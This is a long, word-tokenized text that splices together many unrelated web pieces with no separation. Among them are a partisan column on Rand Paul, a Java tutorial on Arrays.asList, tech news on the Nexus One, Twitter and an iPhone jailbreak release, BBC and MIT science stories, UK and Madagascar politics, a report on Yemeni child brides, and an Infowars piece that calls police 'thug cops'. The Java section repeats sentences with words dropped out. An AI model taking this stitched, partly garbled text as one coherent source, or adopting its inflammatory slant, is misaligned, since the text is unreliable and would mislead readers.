It 's the easiest thing in the world for a grandstanding liberal to push a libertarian into a corner .
Then they 'll get praise for their unflinching courage , like Morris Dees ' South Poverty Law Center putting another " hate group " in the Index and waiting for the contributions to roll in .
Here 's Maddow , brandishing the Civil Rights
Act of 1964 , as though this is the only matter worth considering in the forthcoming race between Rand Paul and the Democrat , an awful neo-liberal prosecutor , Kentucky 's current attorney general , Jack " I'm a Tough Son - of - a - Bitch " Conway .
Between Conway and Paul , which one in the U.S. Senate would more likely be a wild card – which is the best we can hope for these days – likely to filibuster against a bankers ' bailout , against reaffirmation of the Patriot Act , against suppression of the CIA 's full torture history ?
Paul , one would have to bet , and these are the votes that count , where one uncompromising stand by an outsider can make a difference , unlike the gyrations and last - ditch sell - outs of Blowhard Bernie Sanders , no doubt a hero to Maddow and [ Amy ] Goodman .
Liberals love grandstanding about what are , in practice , distractions .
You think the Civil Rights Act of 1964 is going to come up for review in the U.S. Senate ?
If Rand Paul had n't been so preoccupied with winding up for what he plainly thought was his knock - out punch , concerning Maddow 's posture on the right to bear arms in every restaurant in America from Joe 's Diner to Le Cirque , he could have turned the tables easily enough , just by saying that this ritual flourishing of the 1964 Civil Rights
Act does n't have too much to do with what has happened to blacks since that glorious day , from an appalling school system , to blighted housing , constricted employment possibilities , shriveled share of the national income and most recently the great transfer in US history of money and assets from African Americans to rich white people by the mortgage speculators , given free rein by Democrats and Republicans .
Unfortunately not everything that should be trivial actually is .
One example is converting Java arrays to lists .
Of course , there is Arrays .
toList , but using this method carelessly will almost certainly lead to nasty surprises .
To see what I mean consider the following program and try to predict its output :
package com.wordpress.mlangc.arrays ; import java.util .
Arrays ; public class ArraysToList { public static void main ( final String [ ] args ) { System.out.println ( Arrays.asList( new String [ ] { " a " , " b " } ) ) ; System.out.println ( Arrays.asList( new Integer [ ] { 1 , 2 } ) ) ; System.out.println ( Arrays.asList ( new int [ ] { 1 , 2 } ) ) ; System.out.println ( Arrays.asList( new String [ ] { " a " , " b " } , " c " ) ) ; } }
As the Javadocs for Arrays .asList are quite vague , I ca n’t blame you for having some difficulties coming to a conclusion , so here is the answer step by step :
Line 9 prints “ [ a , b ] ” to our shiny little console which is pretty much what one would expect from a sane API , so we are happy .
to our shiny little console which is pretty much what one would expect from a sane API , so we are happy .
The same is true for line 12 which results in “ [ 1 , 2 ] ” .
.
Line 15 however is different , not only because 15 is not 12 , but also because an int is not an Integer , and therefore prints “ [ [ I@39172e08 ] ” to our console , that is not shiny anymore .
Instead of a list containing two Integer objects , we got a list containing the array as its sole element .
is not an , and therefore prints to our console , that is not shiny anymore .
Instead of a list containing two objects , we got a list containing the array as its sole element .
After what we have seen above , it should not take you by surprise that line 18 results in another mess that looks like “ [ [ Ljava.lang.String;@20cf2c80 , c ] ” .
So , what happened ?
The first two print statements worked as expected , because the Java Language Specification states that calling a method with signature foo( T… t) like foo ( new T [ ] { bar , baz } ) is semantically equivalent to foo ( bar , baz ) .
In Arrays .asList T is a type parameter , so it has to be an Object , and this is not true for int , but for int [ ] .
Thats why the statement in line 16 is equivalent to
Arrays.asList( new Object [ ] { new int [ ] { 1 , 2 } } )
Last but not least , the statement in line 19 called for trouble from the very beginning .
We told the compiler that we want a list containing an array of strings and a string , which is exactly what we got .
So far for the explanation , but there is something else we can learn from that :
The real source of confusion is not that varargs feature is badly designed ; I would rather say that the opposite is true .
The problem is that Arrays .asList violates EffJava2 Item 42 , which explains clearly , in fact giving Arrays .
asList as a bad example , why you should be quite careful when designing APIs that use Java varargs .
I wo n’t repeat the reasoning of the book here , as you really should read it yourself , but for the sake of completeness I have to point out that the problematic statements from above would have been rejected by the compiler back in the old days of Java 1.4 , which was a good thing .
We can still use Arrays .
asList today , but doing so safely requires us to be aware of the subtillities we are facing .
Here are a few rules for converting arrays to lists , that guarantee nothing unexpected happens :
If you convert to a list just to convert to a string , use Arrays .
toString instead .
It does what you want all the time and also works for arrays of primitives .
If you want to convert an array of primitives to a list of boxed primitives , take advantage of Apache Commons Lang , which most likely is a dependency of your project already anyway , and use ArrayUtils.
toObject like this : List < Integer > list = Arrays.asList( ArrayUtils.toObject( new int [ ] { 1 , 2 } ) ) ;
Note however that lists of boxed primitives should not generally be preferred over arrays containing primitives .
If you want to convert an array of object references , use Arrays .asList directly : List < String > list = Arrays.asList( new String [ ] { " a " , " b " } ) ;
Do n’t forget to make sure that the people you work with wo n’t emulate you carelessly .
Of course , you can also choose to just remember that Arrays .
asList might behave unexpectedly and use plain for loops instead , but that clutters your code and comes with a performance penalty .
Sometimes it 's good to be the chosen child , the special one , and in the eyes of Google the Nexus One is that special phone -- at least for the moment .
As such it seems to have been given a special treat : access to Froyo earlier than expected .
TechCrunch 's MG Siegler is reporting that his handset received Android 2.2 overnight .
So far we 're not hearing too many other reports of folks seeing this update , but that could be thanks to everyone sleeping off a week of exciting announcements .
Sound off in comments if you 're waking up to this frosty , low - calorie snack . :
We 're not sure how this is being rolled out , as hardly anyone is seeing updates , but via Droidnytt we found a number of reports on Twitter that people are indeed seeing the update .
Count us among the lucky few who just received the OTA Froyo update , to our original T - Mobile - based device .
We 've done some additional investigation , and as far as we can tell , Google is only updating review Nexus
Ones that had been provided to the press -- not off - the - shelf phones .
We 'll stay on this and let you know more as soon as we do .
[ Thanks to everyone who sent this in ]
Let 's Not Chew This One Up and Spit Him Out
The gay movement — which can be overly concerned with appearances — did n't know what to do with Mike Jones after he outed Ted Haggard , then the president of the National Association of Evangelicals , and a good buddy of George W. Bush .
Gay organizations and groups treated Jones like he was radioactive because — gasp — the man was a sex worker .
Jones was left feeling bitter and broke after he did gays and lesbians everywhere a huge service stepping forward and outing / truthing Haggard .
By exposing Haggard , Jones did real and lasting damage to the credibility of anti-gay ranters everywhere .
Joe Jervis got an interview with Jo-Vanni Roman , the male escort that George Rekers hired to handle his baggage on his European vacation , and it's clear that Roman — who can do a real service to the gay rights movement by telling the truth about what happened in Europe and bring down a malicious , malignant , and possibly / predictably self - hating , anti-gay gay bigot in the process — is in way over his head .
Rekers made Roman sign a confidentiality agreement and he 's threatening to lawyer up and sue anyone and everyone he can to restore his " good " name .
( Sorry , George , but it 's too late for that . )
Roman needs a lawyer and he needs one now .
Writes Andy at Towleroad
I hope someone in South Florida is stepping up to give Lucien some good advice and offering him some support .
The young man really sounds in need of guidance , though I do commend him for speaking out for what he believes and exposing this dangerous , anti-gay hypocrite .
Let 's hope that someone steps up ?
No , let 's demand that one of the big gay orgs — HRC , Lambda Legal , NCLR — steps up and provides Roman with the lawyer and the advisors he needs .
Let 's not treat this kid , who is just 20 , like he 's done something wrong , or like he's an embarrassment to the gay rights movement because — gasp — he was doing sex work , as has been reported , to pay his college tuition .
This kind of hypocrisy — Haggard 's kind , Craig 's kind , Rekers ' kind — needs to be exposed .
And it 's likelier to be exposed if the people who bring it to light are n't treated like pariahs and are instead offered real and tangible support .
Bringing something like this — this being the appalling , malicious hypocrisy of George Rekers — out into the open can't become a path to fame and / or fortune .
It is n't and should n't be something that sets a person up for life , or something that an escort cashes in on as he leaves the rentboy business .
Because that dynamic would undermine the credibility of anyone who does the right thing and steps forward when a powerful political or religious leader is saying one thing in public about homosexuality and doing quite another thing in private .
But we can't leave people like Jones or Roman dangling , not if we want people like Jones and Roman to keep stepping forward .
And we do .
UPDATE : Powerhouse blogger Joe Jervis is organizing support for Jo-Vanni .
Good on you , Joe , and here 's hoping a national organization steps up to the plate .
The Mac faithful will have more than just Valve - developed games at their disposal when Steam makes the transition to Apple computers next week .
At least two more games , first - person shooters Killing Floor and Red Orchestra Ostfront 41 - 45 , are coming too .
Advertisement
Valve Dates Steam for Mac ; It 's May 12
Valve sent word five minutes ago that the public release of Steam for the Mac will be on May 12 .
No Read more
Big Download confirmed with publisher Tripwire Interactive that it 's porting its pair of Unreal Engine - powered shooters to the Mac .
Both titles are expected to get the full Steam treatment , with Achievements , cross- platform play and access to already released downloadable content .
Advertisement
Expect Killing Floor and Red Orchestra on or around launch .
Who else will follow suit and squeeze more money from the under - served Mac userbase , a demographic that really likes to spend money ?
G/O Media may get a commission Subscribe and Get Your First Bag Free Promo Code AtlasCoffeeDay20
Killing Floor and Red Orchestra coming to the Mac [ Big Download ]
Please turn on JavaScript .
Media requires JavaScript to play .
Faced with the threat of a booming population going hungry in a warming world , there is quiet confidence among many researchers that technology can provide solutions , reports the BBC 's environment correspondent , David Shukman .
The warning of a " perfect storm " is partly intended to focus attention on the positive role that science can play - and to galvanise politicians to support it .
There is a glimpse of that potential at the Rothamsted plant research centre in Hertfordshire , where 160 years of experiments have repeatedly boosted the key feature of crops - their yield .
PERFECT STORM 2030 BBC correspondents explore the forecast by UK chief scientist John Beddington , of a " perfect storm " of food , water and energy shortages in 2030 .
They also consider what scientists and members of the public can do to help avert a crisis .
Send us your comments
During a visit to the centre 's experimental plots and carefully managed greenhouses it is hard to miss the sense of optimism that research can offer answers .
That is partly the result of Rothamsted 's long history .
Back in the 1850s , a typical wheat field would produce about one tonne of grain per hectare , compared with a typical British field that now yields about nine times that .
So the challenge is to find ways of boosting output in the world 's biggest producers , China and India , where yields are between one - quarter and one - third of the British level .
Dwarf wheat Currently there is a potentially catastrophic imbalance between the world 's people and the food they need .
Roughly 50 % of the population lives in areas where there is only 30 % of the arable land .
It is frustrating that GM is not more acceptable
Professor Keith Goulding
One technique that has transformed productivity is the breeding of so - called " dwarf " varieties - traditionally most of a wheat plant 's energy goes into growing a long stem rather than nurturing the vital grains that are needed .
Following dwarf wheat out of the lab and into the field are plants that are better at resisting drought or more efficient at using scarce nutrients .
Does Professor Peter Shewry , acting director of Rothamsted , think it 's possible that a global population of 8 billion could be fed , in just 21 years ' time ?
" Yes " , he says , " it is definitely doable " .
But though many of the technologies exist now , much depends on finding ways of transferring them .
Local conditions , a lack of finance , and regional cultures could all have an impact on how readily the modern techniques are exploited .
Awkward choices
Most controversial is the question of whether to harness the controversial science of genetic modification ( GM ) - the transfer of genes to enhance a particular attribute .
The scientists at Rothamsted make no secret of their preference for GM to be explored as an option .
Professor Keith Goulding , head of soil studies , says yields can be boosted without GM , but would be enhanced far more rapidly with it .
" We 'd like it considered more sensibly because it has the potential for controlling pests and disease virtually without using chemicals at all .
" It is frustrating that GM is not more acceptable .
We do n't have to put more exotic genes across the species barrier - it can be just about using genes from other plants . "
So , in the countdown to the UK chief scientist 's warning of a " perfect storm " in 2030 , society will be forced to confront some awkward choices : science may have answers but will people want them ?
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
Who is online
In total there are 6 users online :: 3 registered , 0 hidden and 3 guests ( based on users active over the past 5 minutes )
Most users ever online was 41 on 18 Jun 2020 , 19:43
Registered users : DoctorJohn , Google Adsense [ Bot ] , irvinz
Legend : Administrators , Forum Sponsors , Global moderators , Gold Supporting Members , Supporting Members
Twitter has acquired atebits , the company that makes popular Tweetie applications for the iPhone and Mac OS X .
In so doing , the company is fortifying itself as a mobile communications service – that happens to have a web site you can also use .
Twitter has been radically open with the way it processes the small messages its users send , encouraging third - party developers to use that information to build applications that let people use the service more easily and in places and ways the company itself does n't have the time or inclincation or expertise to do on its own .
It 's a classic crowdsourcing move .
Developers have taken that ball and run with it , with abandon .
While it 's possible to use Twitter purely in an SMS context – sending texts from your phone that go into your timeline , or as direct messages to others – and to use your Twitter web page , there have been a plethora of desktop and smartphone applications that have added functionality and friendly graphical interfaces .
And it is via these that Twitter has spread like wildfire .
By far one of the most successful has been Tweetie , a $ 3 app in the Apple iTunes store that will now be free .
Twitter says this plugs a big hole for the company , as iPhone users assumed they would be able to find an official iPhone app from Twitter and , when they did n't , sometimes left in a huff .
" Careful analysis of the Twitter user experience in the iTunes AppStore revealed massive room for improvement , " Twitter said in a blog post .
" People are looking for an app from Twitter , and they 're not finding one .
So , they get confused and give up .
It 's important that we optimize for user benefit and create an awesome experience . "
We have long held that Twitter 's web presence was entirely incidental to them as a business or a as service .
When they added search to user home pages we shrugged , and when others cited web site visits to quantify the popularity and reach of Twitter , we laughed in their general direction .
Twitter itself acknowledges that mobile is where it's at : " Mobile has always been a focus for us — starting with SMS which lead to the 140 character limit . "
Twitter is about whispering in Times Square at high noon and being heard around the world .
The less friction there is to the process , the more sending Tweets becomes as easy as speed - dialing a mobile phone , the more it becomes part of the fabric of our everyday lives ( for better or for worse ) .
The Twitter web experience and desktop clients are mere accommodations to extend to increasingly peculiar places the overwhelmingly superior premise of mobile .
Loren Brichter , the man behind atebits , sounds like a kid who got the keys to the candy store as he makes this point : " Some amazing stuff will soon be possible , both in terms of simplifying the Twitter experience and in allowing people to use Twitter any place they might be .
I ’m really looking forward to the next generation of mobile clients , and hopefully the next time you hear from me it ’ll be on the Twitter blog !
See Also :
Image caption Neil Gaiman has said his episode was originally titled The House of Nothing
The fantasy author Neil Gaiman has spoken of the divine power he felt while writing his TV episode of Doctor Who .
The author of Stardust and Coraline has already submitted his story , which is due to air in 2011 .
" I do n't know what it 's like to be God - obviously , " Gaiman told the BBC .
" Until that very first moment when you get to sit down and type the words in your script : INTERIOR .
TARDIS . "
He said : " Suddenly I got a very good idea of what it must feel like .
I went : ' I 'm writing it now this scene in the Tardis .
I 'm writing it !'
And that was amazing , it was wonderful . "
' Bit flabby '
Gaiman met Doctor
Who show - runner Steven Moffat for a script read - through last week .
He posted a picture of himself on Twitter - with Moffat and writer Richard Curtis - holding up a copy of the script .
His fingers obscured the episode title .
Gaiman said : " It 's going to be shooting in August and we were going through it and figuring out ways that money could be saved and ways we could have some things happen faster .
" It was a little bit flabby . "
The author also commented on Terry Pratchett 's recent comments in SFX Magazine that Doctor Who should n't be " classified as science fiction " .
" Doctor Who has never pretended to be hard science fiction , " Gaiman said .
" At best Doctor Who is a fairytale , with fairytale logic about this wonderful man in this big blue box who at the beginning of every story lands somewhere where there is a problem ... "
Gaiman , whose Neverwhere TV series was shown on the BBC in 1996 , said he'd had to spend a long time " being coy " before it was revealed he was writing a Doctor Who story .
" Now I know what I can tell people :
It will be on television - and it's in colour ! "
IT was British band Manfred Mann who recorded the 1960s classic hit Semi- detached Suburban Mr Jones .
It described the ordinariness and friendliness of a sociological landscape redolent of the “ Mother Country ” in the early to mid-twentieth century .
But now “ terraced housing ” is coming to a suburb near you – Bellvista , to be precise – with lots as small as 180 square metres , though no doubt the styling will be a little more 21st century , and promising a different tune .
And just how many storeys they might consist of is as yet unknown .
Development behemoth Stockland intends to introduce the “ product ” as part of a massive extension to the Bellvista master - planned community , should it get the tick from Sunshine Coast council .
Overall , the application involves around 750 dwelling units consisting of about 550 detached houses and 200 semis .
The 180 sq m lots would have a width of between seven and 10 metres .
A village centre and small shopping complex is also envisaged .
The application comes to light just as neighbouring Pelican Waters applies for similar - sized lots in a huge marina and multi-boat storage development at Bledisloe Boulevard .
A Stockland spokeswoman said the proposal was not the first of its kind in this region .
“ There are similar lots at Peregian and Sunshine Cove ( in Cooloola ) , ” she said .
“ The reasoning behind it is to be able to provide a variety of products in the estate , but they will make up quite a small proportion of the overall product .
“ It will provide affordable opportunities for first - home buyers , also empty - nesters seeking to trade down . ”
She said no storey heights for the dwelling had yet been decided as “ it will depend on market conditions ” .
The spokeswoman said Stockland had recently set a record in Melbourne with 212 sq m detached houses becoming the smallest in that city .
The two DAs were listed as part of a council document highlighting “ upcoming significant development applications ” to be presented to the council in coming weeks .
In what could set the stage for a fundamental shift in commercial aviation , an MIT - led team has designed a green airplane that is estimated to use 70 percent less fuel than current planes while also reducing noise and emission of nitrogen oxides ( NOx ) .
The design was one of two that the team , led by faculty from the Department of Aeronautics and Astronautics , presented to NASA last month as part of a $ 2.1 million research contract to develop environmental and performance concepts that will help guide the agency 's aeronautics research over the next 25 years .
Known as " N+3 " to denote three generations beyond today 's commercial transport fleet , the research program is aimed at identifying key technologies , such as advanced airframe configurations and propulsion systems , that will enable greener airplanes to take flight around 2035 .
MIT was the only university to lead one of the six U.S. teams that won contracts from NASA in October 2008 .
Four teams -- led by MIT , Boeing , GE Aviation and Northrop Grumman , respectively -- studied concepts for subsonic ( slower than the speed of sound ) commercial planes , while teams led by Boeing and Lockheed - Martin studied concepts for supersonic ( faster than the speed of sound ) commercial aircraft .
Led by AeroAstro faculty and students , including principal investigator Ed Greitzer , the H. Nelson Slater Professor of Aeronautics and Astronautics , the MIT team members include Aurora Flight Sciences Corporation and Pratt & Whitney .
Their objective was to develop concepts for , and evaluate the potential of , quieter subsonic commercial planes that would burn 70 percent less fuel and emit 75 percent less NOx than today 's commercial planes .
NASA also wanted an aircraft that could take off from shorter runways .
Designing an airplane that could meet NASA 's aggressive criteria while accounting for the changes in air travel in 2035 -- when air traffic is expected to double -- would require " a radical change , " according to Greitzer .
Although automobiles have undergone extensive design changes over the last half - century , " aircraft silhouettes have basically remained the same over the past 50 years , " he said , describing the traditional , easily recognizable " tube - and - wing " structure of an aircraft 's wings and fuselage .
Two planes for two missions
The MIT team met NASA 's challenge by developing two designs : the 180 - passenger D " double bubble " series to replace the Boeing 737 class aircraft , currently used for domestic flights , and the 350 passenger H " hybrid wing body " series to replace the 777 class aircraft now used for international flights .
advertisement
The engineers conceived of the D series by reconfiguring the tube - and - wing structure .
Instead of using a single fuselage cylinder , they used two partial cylinders placed side by side to create a wider structure whose cross-section resembles two soap bubbles joined together .
They also moved the engines from the usual wing - mounted locations to the rear of the fuselage .
Unlike the engines on most transport aircraft that take in the high - speed , undisturbed air flow , the D - series engines take in slower moving air that is present in the wake of the fuselage .
Known as the Boundary Layer Ingestion ( BLI ) , this technique allows the engines to use less fuel for the same amount of thrust , although the design has several practical drawbacks , such as creating more engine stress .
According to Mark Drela , the Terry L. Kohler Professor of Fluid Dynamics and lead designer of the D series , the design mitigates some of the drawbacks of the BLI technique by traveling about 10 percent slower than a 737 .
To further reduce the drag and amount of fuel that the plane burns , the D series features longer , skinnier wings and a smaller tail .
Independently , each tweak might not amount to much , but the " little 5 - percent changes add up to one big change , " Drela said .
Although the plane would travel slightly slower than a 737 , he said that some of this time could be recovered because the plane 's wider size should allow for quicker loading and unloading .
Not only does the D series meet NASA 's long - term fuel burn , emissions reduction and runway length objectives , but it could also offer large benefits in the near future because the MIT team designed two versions : a higher technology version with 70 percent fuel - burn reduction , and a version that could be built with conventional aluminum and current jet technology that would burn 50 percent less fuel and might be more attractive as a lower risk , near - term alternative .
Carl Burleson , the director of the Federal Aviation Agency 's Office of Environment and Energy , said that in addition to its " really good environmental performance , " the D series is impressive because its bubble design is similar enough to the tube - and - wing structure of current planes that it should be easier to integrate into airport infrastructure than more radical designs .
" You have to think about how an airport structure can support it , " he said . "
For some other designs , you could have to fundamentally reshape the gates at airports because the planes are configured so differently . "
Although the H series utilizes much of the same technology as the D series , including BLI , a larger design is needed for this plane to carry more passengers over longer distances .
The MIT team designed a triangular - shaped hybrid wing body aircraft that blends a wider fuselage with the wings for improved aerodyamics .
The large center body creates a forward lift that eliminates the need for a tail to balance the aircraft .
The large structure also allows engineers to explore different propulsion architectures for the plane , such as a distributed system of multiple smaller engines .
Although the H series meets NASA 's emissions - reduction and runway - length goals , the researchers said they will continue to improve the design to meet more of NASA 's objectives .
The MIT team expects to hear from NASA within the next several months about whether it has been selected for the second phase of the program , which will provide additional funds to one or two of the subsonic teams in 2011 to research and develop the technologies identified during the first phase .
The researchers acknowledge that some propulsion system technology still needs to be explored .
They have proposed evaluating the interactions between the propulsion system and the new aircraft using a large - scale NASA wind tunnel .
Even if the MIT designs are not chosen for the second phase , the researchers hope to continue to develop them , including testing smaller models at MIT's Wright Brothers ' Wind Tunnel and collaborating with manufacturers to explore how to make the concepts a reality .
A coalition of police authority leaders and senior officers warns today that the new government 's plans for sweeping reform of the service will make the country 's streets less safe .
The plans for directly elected commissioners , who will oversee chief constables , are expected to form a centrepiece of Tuesday 's Queen 's speech to parliament .
But in a letter to the Observer , police authority chiefs voice outright hostility to the measures , saying they are " uncosted " , " driven by dogma " and " undermined by absence of debate " .
Signed by the chairman of the Association of Police Authorities , Rob Garnham , who is also a Tory councillor , the lette r expresses fears that the public " is unaware of the turmoil that may be unleashed by these proposals " .
Garnham says there is an inherent danger in introducing a system in which the people running local police services have a " politically motivated agenda " : there is a danger that chasing votes may take priority over the pursuit of criminals .
The APA is also concerned that individuals with extremist views or personal agendas could seek election as commissioners .
Under the Tory - Liberal Democrat plans , the APA would be replaced with elected individuals who would decide " policing priorities for local communities " and exercise control over forces ' budget and strategy .
Several major policing organisations are pushing for crisis talks with the new home secretary , Theresa May .
The decision to press ahead has dismayed Britain 's two most senior police officers , Sir Paul Stephenson , head of Scotland Yard , and Sir Hugh Orde , president of the Association of Chief Police Officers .
Orde is understood to have raised his opposition directly in a meeting with May last Monday .
Derek Barnett , president of the Police Superintendents '
Association , said it was preparing to meet May at the earliest opportunity .
" We need to register our concerns , " he said .
" We will speak to the home secretary to try to reach a pragmatic and sensible approach .
We will try to point out some of the tensions that will exist in the real world . "
One police source said the policies contained within last week 's 34 - page programme for government indicated that the new coalition had " no understanding of what policing is about " .
The row comes as the government prepares to announce £ 6bn of savings by identifying waste in state spending , as well as a legislative programme aimed at devolving power over everything from policing to new schools .
Last night there was speculation that the planned cuts for this year , which will include slashing spending on quangos by £ 513 m and a clampdown on civil service and ministerial perks , would go further than merely cutting waste .
The cuts will be announced tomorrow .
Unconfirmed reports in Whitehall suggested that student numbers could be cut by 10,000 compared with the planned level from September and that further savings could be made by accelerating plans to cut back the Child Trust Fund .
As well as bills on police reform and allowing schools greater freedom to become academies , the Queen 's speech will contain legislation for a referendum on electoral reform and a bill to transfer powers to regulate banks from the Financial Services Authority to the Bank of England .
Orde is understood to have told David Cameron in the runup to the election that there was an urgent case for an independent review of policing , pointing out that the last took place in 1962 .
However , despite the Tory and Lib Dem announcement that they would create six commissions and 28 reviews to consider contentious areas of policy , policing missed out .
" Is the structure designed in 1962 the best structure for a police force operating in 2010 ? "
Orde asked .
Meanwhile , a new paper from the research director of the Centre for Crime and Justice Studies at King 's College , London , warns of a schism between policing and the new government , claiming the coalition is " failing to grasp the nettle " over what the future priorities of policing should be .
Roger Grimshaw found that the parties ' manifesto statements on the issue could not be easily reconciled and argued that a wide - ranging debate on policing was crucial .
Concern is also mounting over the extent of cuts facing police forces and the lack of a commitment to increase officer numbers .
The key Lib Dem election promise of employing 3,000 more police officers was omitted completely from last week 's coalition policy pledge .
In her first major speech as home secretary last Tuesday , May attempted to win over rank - and - file officers by focusing on the need for " commonsense " policing .
• This article was amended on 27 May 2010 to correct Roger Grimshaw 's title from director to research director at the Centre for Crime and Justice Studies at King 's College , London .
ANTANANARIVO ( Reuters ) - Madagascan security forces seized control of a military camp on Thursday , quashing an attempted mutiny by a small group of military police .
Two government soldiers were killed and three civilians wounded , a military police commander said , in the latest escalation of a political crisis that has rocked the Indian Ocean island since early last year .
Political analysts say there is mounting frustration within some elements of the armed forces at President Andry Rajoelina ’s failure to end the economically crippling turmoil , and they warn the situation could deteriorate further .
Security forces overran the barracks when negotiations with the dissident military police inside broke down and a new gun battle erupted .
The renegade troops had retreated to the camp following an earlier gun battle in the capital Antananarivo .
“ They have fled , ” regional military police commander Colonel Richard told reporters .
Earlier he had warned of a “ bloodbath ” if the renegade troops refused talks and there were no immediate details of casualties among the mutineers .
Military officials said 21 renegade troops from the National Gendarmes Intervention Force ( FIGN ) were involved in the clashes .
Several hundred anti-government protesters and a number of church leaders aligned with former president Marc Ravalomanana rallied behind the mutinying troops .
A combination of angry military personnel and disenfranchised church leaders and civilians has in the past brought down governments in Madagascar , political risk consultant Lydie Boka said .
“ There seems to be a combination of factors that could quickly lead to a deterioration of the situation unless a solution is found quickly , but it would have to be accepted by all sides , ” Boka told Reuters .
“ In the short run maybe ( they ) can be calmed down but it is not sustainable over the medium term . ”
INJUSTICES AND ARRESTS
Political instability has convulsed the world ’s fourth largest island , eyed increasingly by foreign investors for its oil and mineral resources , since Rajoelina grabbed power with military backing in March last year .
Earlier this month , Madagascar ’s army chief rowed back on an ultimatum given to Rajoelina to find a solution to the leadership crisis after the president pledged to form a “ neutral ” government .
Some analysts say the country ’s political leaders are manipulating the deep rifts within the armed forces .
A military police officer leading the mutiny , Colonel Raymond Andrianjafy , said “ injustices and arrests ” had prevailed under Rajoelina ’s leadership .
“ The truth will never die and we are prepared to go all the way and take hold of our responsibilities , ” Andrianjafy told reporters late on Wednesday .
The opposition has dismissed the former disc jockey ’s talk of neutrality and said a unilaterally organised referendum in August and a presidential ballot slated for November would lack transparency and legitimacy .
In the eyes of many people on the island , Rajoelina , Africa ’s youngest leader , has failed to deliver on his promise to improve living standards and strengthen civil liberties .
Former president Ravalomanana opened Madagascar ’s doors to major foreign companies , and overseas investment surged to around $ 1.47 billion to 2008 from $ 86 million in 2005 .
Inflows have collapsed , but by how much is not clear .
Your game will appear after this advertisement .
To play this game , you need Adobe Flash Player .
Click the link below !
To play this game , you need Adobe Flash Player .
Click the link below !
GIBBETS 2
SIZE : 4249KB
CREATED BY : Konstantin Boronenkov , Mariya Starovoytova & Oleg Stepuro
Used with Permission
Return to Not Doppler
Save the innocent people being hung by shooting the nooses with your bow and arrow .
Be careful not to miss !
( 13+) 4249 KBKonstantin Boronenkov , Mariya Starovoytova & Oleg StepuroUsed with Permission
The choice is yours , we 've got you covered
Whether you need to find top talent , your next great job opportunity or a consulting solution for managing your business and resourcing challenges , we can help .
Online Poker : Grosvenor wechselt in das iPoker Netzwerk - PokerFirma - Die ganze
Welt ist Poker
PokerFirma - Die ganze Welt ist Poker
PokerFirma - Die ganze Welt ist Poker
Poker Gossip : Casino Sperre für Will Kassouf ?
- PokerFirma - Die ganze Welt ist Poker
PokerFirma - Die ganze Welt ist Poker
PokerFirma - Die ganze Welt ist Poker
Live Poker |
The Vic in London wird verkauft - PokerFirma - Die ganze Welt ist Poker
PokerFirma - Die ganze Welt ist Poker
PokerFirma - Die ganze Welt ist Poker
( CNN ) -- A 12 - year - old Yemeni bride died of internal bleeding following intercourse three days after she was married off to an older man , the United Nations Children 's Fund said .
The girl was married to a man at least twice her age , said Sigrid Kaag , UNICEF regional director for the Middle East and North Africa .
Her death is " a painful reminder of the risks girls face when they are married too soon , " Kaag said Thursday .
Amal Basha , chairwoman of the Sisters Arab Forum for Human Rights , a Yemeni human rights group , identified the girl Friday as Elham Mahdi .
" Elham was married on March 29th and died three days later " and lived in Yemen 's Hajjah province , Basha said .
The girl 's death is the latest in a series of child marriage cases in Yemen , where the minimum age to tie the knot is still under debate .
Frustrated by the recent revelation , a Yemeni government official called the case " a stark reminder that the practice of underage marriage must come to an end . "
" The government has been working tirelessly to cement the minimum marriage age but conservative parliamentarians have stood against it , " said the official , who is not authorized to speak to the media .
" Members of the conservative block need to step up to the responsibility of protecting the rights and freedoms of the young .
NGOs must continue campaigning to shed the light on this unfortunate practice . "
In September , a 12 - year - old Yemeni girl forced into marriage died during childbirth .
Her baby also died , according to the Seyaj Organization for the Protection of Children .
Fawziya Ammodi was in labor for three days before she died of severe bleeding , said Ahmed al - Qureshi , president of the organization .
" Although the cause of her death was lack of medical care , the real case was the lack of education in Yemen and the fact that child marriages keep happening , " al - Qureshi said .
Child brides are common in Yemen , where the United Nations estimates that one in three girls are married before age 18 .
Most are married off to older men with more than one wife , according to a study by Sanaa University .
For the girl 's parents , marriage means the daughters are no longer a financial or moral burden .
Most times , parents get a promise from the husband to wait until the girl is older to consummate the marriage .
" Early marriage places girls at increased risk of dropping out of school , being exposed to violence , abuse and exploitation , and even losing their lives from pregnancy , childbirth and other complications , " UNICEF said .
The issue of Yemeni child brides made headlines in 2008 when 10 - year - old Nujood Ali was pulled out of school and married .
Her husband beat and raped her within weeks of the ceremony .
To escape , Nujood hailed a taxi -- the first time in her life -- to get to the central courthouse where she sat on a bench and demanded to see a judge .
After a well - publicized trial , she was granted a divorce .
Infowars.com
May 23 , 2010
A d v e r t i s e m e n t
{openx:49}
In Maryland , it is a felony to record thuggish cops as they push around skateboarding teenagers , beat sports patrons , and pull guns on motorists for speeding .
“ Several Marylanders face felony charges for recording their arrests on camera , and others have been intimidated to shut their cameras off , ” reports WJZ 23 in Baltimore .
Maryland cops are using a Maryland law that states conversations in private cannot be recorded without the consent of both people involved in order to go about their business of harassing , intimidating , and assaulting citizens .
It is legal according to Maryland ’s attorney general for cops to videotape citizens with dashcams but illegal for citizens to do the same .
State authorities are upset after a video appeared on the internet showing the merciless beating of a university student by thug cops at the University of Maryland in April .
In 2009 , a video surfaced showing a Baltimore cop pushing around and verbally assaulting a teenager .
Numerous videos in other states show cops beating and even murdering citizens .
Cop out of uniform without badge pulls gun on motorcyclist without identifying himself .
Sadistic storm troopers beat student senseless for the sheer pleasure of it .
Baltimore cop assaults teenager for the crime of riding a skateboard .
The Emergency Election Sale is now live !
Get 30 % to 60 % off our most popular products today !
Thirty years after first starring as Lando Calrissian and Han Solo in " The Empire Strikes Back , " Billy Dee Williams , 73 , and Harrison Ford , 67 , reunited at an anniversary screening of the classic film in Hollywood last night .
We 've been seeing the iPad / iPhone Spirit jailbreak demoed here and there for a few weeks now , and here we go -- the download is now available .
The untethered jailbreak works on activated iPhone OS devices running 3.1.2 , 3.1.3 , and 3.2 , although iPad owners are warned that " all this is still sort of beta " and might require you to restore if things break .
That 's not the worst thing in the world , we suppose -- anyone taking the plunge ?
[ Thanks to everyone who sent this in ]
this site
In order to fully experience everythinghas to offer , you must upgrade your browser .
Please use the links below to upgrade your existing browser .
Tutto il mondo del gioco d’azzardo pubblico , compresi i casino online dal vivo con croupier umani , è fermo : anche con l’inizio di un nuovo anno grandi novità non se ne vedono all ’orizzonte e si naviga , come detto tante volte , ancora a vista in attesa di sviluppi o novità che purtroppo tardano ad arrivare e rendono ancor più angosciante per gli operatori del settore il traguardo di “ acque più serene da navigare ” .
